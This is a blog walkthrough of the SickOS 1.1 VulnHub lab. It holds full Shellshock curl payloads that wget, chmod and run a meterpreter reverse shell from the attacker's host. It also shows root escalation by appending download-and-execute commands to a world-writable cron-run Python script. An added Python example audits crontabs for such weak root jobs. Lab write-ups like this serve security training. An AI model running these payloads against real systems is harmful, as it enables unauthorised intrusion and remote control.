Tuesday, December 29, 2015

SickOS 1.1 writeup

Quick writeup about SickOS 1.1 from vulnhub.

As usual, nmap is the first runner:
$ nmap -p- -A -v -T5 $IP

Apart from port 22/tcp, the interesting finding is an open proxy on port 3128.

As a test I configured my browser to use this proxy and browsed through it to a funny welcome page:

Time to wake up nikto, configured to use the proxy of course:
$ nikto -host $IP -useproxy http://$IP:3128
Our good fellow found a possible way in:

nikto is right: the script it flagged is vulnerable to Shellshock (CVE-2014-6271). The User-Agent below carries the bash function-definition prefix followed by a command; the "echo" prints an empty line that terminates the HTTP headers, so the command output comes back in the response body. With $URL set to the URL of the script nikto reported:
$ curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://$IP:3128 $URL

I expect to be running as an unprivileged user, so to get a more comfortable environment I created a meterpreter reverse shell with msfvenom, then downloaded and executed it on the target, again sending each command through the proxy to $URL, the vulnerable script (absolute paths, because the CGI environment has no useful PATH):

$ CMD="/usr/bin/wget -O /tmp/revshell http://$ME/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128 $URL
$ CMD="/bin/chmod 755 /tmp/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128 $URL
$ CMD="/tmp/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128 $URL
msfconsole shows a new session as uid 33 (www-data): time to enumerate the system and get root.

/var/www holds a CMS, already seen with nikto because it is in the robots.txt Disallow list, but a .py file gets my attention first. It is world-writable and world-executable, and it says:
print "I Try to connect things very frequently\n"
print "You may want to try my services"

In the hope that "I" means root, I tried a simple:

$ echo "import os" >> connect.py
$ echo "os.system('touch /tmp/foo')" >> connect.py
and waited a couple of seconds before running ls -al /tmp:

So connect.py is executed by root every so often, most likely from a cron job: a good find.

To make further code execution quicker I added one more line to connect.py:
$ echo "os.system('/tmp/run')" >> /var/www/connect.py
Then I created a new meterpreter reverse shell and, through /tmp/run, downloaded and executed it:

$ echo "#!/bin/bash" > /tmp/run
$ echo "wget -O /tmp/revshell4445 http://$ME/revshell4445" >> /tmp/run
$ echo "chmod 755 /tmp/revshell4445" >> /tmp/run
$ echo "/tmp/revshell4445 &" >> /tmp/run
$ echo "rm -f /tmp/run" >> /tmp/run
$ chmod 755 /tmp/run
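The privilege escalation above works because a root-run scheduled script is writable by everyone. Rather than stumbling on such a file by hand, a practitioner wants to search for it systematically. The following is an added example, not part of the original writeup: it parses /etc/crontab-style text (five time fields, user, command, plus @reboot-style aliases), pulls the absolute paths out of each root job's command and reports any that are world-writable or sit in a world-writable non-sticky directory. demo() builds a constructed crontab and files in a temporary directory so it runs offline; the file names, modes and crontab lines in it are made up for the demo.

```python
"""Find cron jobs run as root whose script a low-privilege user can edit.

Added example for this writeup, not the author's code. On a real host,
feed find_weak_cron_jobs() the contents of /etc/crontab and each file in
/etc/cron.d; the demo() scenario below is constructed.
"""
import os
import shlex
import stat
import tempfile


def parse_system_crontab(text):
    """Yield (user, command) for every job line; skip comments and VAR=value."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):            # @reboot user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                yield parts[1], parts[2]
            continue
        if "=" in line.split()[0]:          # SHELL=/bin/sh, PATH=...
            continue
        parts = line.split(None, 6)         # five time fields, user, command
        if len(parts) == 7:
            yield parts[5], parts[6]


def script_paths(cmd):
    """Absolute paths in a command: interpreter, script and path arguments."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:                      # unbalanced quotes: fall back
        tokens = cmd.split()
    return [t for t in tokens if t.startswith("/")]


def weakness(path):
    """Return a reason string if `path` can be edited or replaced by anyone."""
    try:
        st = os.stat(path)
    except OSError:
        st = None                           # missing file: only the directory matters
    if st is not None and st.st_mode & stat.S_IWOTH:
        return "file is world-writable"
    parent = os.path.dirname(path) or "/"
    try:
        pst = os.stat(parent)
    except OSError:
        return None
    # A world-writable, non-sticky directory lets anyone rename the file away
    # and drop a replacement (or create it if missing). Group-writable files
    # need a group-membership check as well, which this example leaves out.
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        return "parent directory is world-writable and not sticky"
    return None


def find_weak_cron_jobs(crontab_text, privileged=("root",)):
    """Return (user, path, reason) for privileged jobs pointing at weak files."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user not in privileged:
            continue
        for path in script_paths(cmd):
            reason = weakness(path)
            if reason:
                findings.append((user, path, reason))
    return findings


def demo():
    """Constructed scenario: a 0777 connect.py beside a 0755 backup script."""
    d = tempfile.mkdtemp()                  # mode 0700, so the directory is safe
    weak = os.path.join(d, "connect.py")
    safe = os.path.join(d, "backup.sh")
    for path, mode in ((weak, 0o777), (safe, 0o755)):
        with open(path, "w") as f:
            f.write("#!/usr/bin/env python\nprint('I Try to connect things')\n")
        os.chmod(path, mode)
    crontab = (
        "# constructed /etc/crontab for the demo\n"
        "SHELL=/bin/sh\n"
        "PATH=/usr/bin:/bin\n"
        "*/1 * * * * root /usr/bin/python " + weak + "\n"
        "0 3 * * * root " + safe + " --full\n"
        "@reboot www-data " + weak + "\n"   # not root: ignored
    )
    return find_weak_cron_jobs(crontab)


if __name__ == "__main__":
    for user, path, reason in demo():
        print("%s job -> %s: %s" % (user, path, reason))
```

The www-data entry is deliberately skipped: a job you can edit that already runs as you gains nothing, which is the same reason the writeup first confirmed with touch that connect.py really runs as root before planting the shell.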
After a minute a new session appears in msfconsole:

And the flag is:

Thanks to D4rk for letting me play with his vulnerable box.
